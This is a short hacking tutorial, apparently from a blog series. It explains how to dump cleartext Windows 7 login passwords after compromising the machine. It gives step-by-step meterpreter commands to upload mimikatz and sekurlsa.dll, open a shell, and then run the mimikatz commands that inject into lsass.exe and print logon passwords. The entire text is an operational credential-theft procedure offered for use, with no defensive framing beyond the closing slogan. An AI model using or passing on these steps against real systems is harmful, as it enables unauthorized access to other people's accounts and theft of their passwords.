Step1: Hack Win-7 and get the meterpreter shell. (As I demonstrated in the previous Post) Step 2: Now gain system level privileges (using sysret.exe method, as demonstrated in the previous Post) Step 3 Type the following commands inside the meterpreter shell: upload <path of mimikatz.exe> c:\\ upload <path of sekurlsa.dll> c:\\ Step 4: Get into windows command prompt by typing " shell " command Then get the mimikatz shell by typing " mimikatz " into the command prompt *note: first navigate to the directory where mimikatz is uploaded. Step 5: Now type the following commands: privilege::debug inject::process lsass.exe sekurlsa.dll sekurlsa::logonPasswords full After typing the third command you can view the clear text password on your screen :)
Attack is the best defence.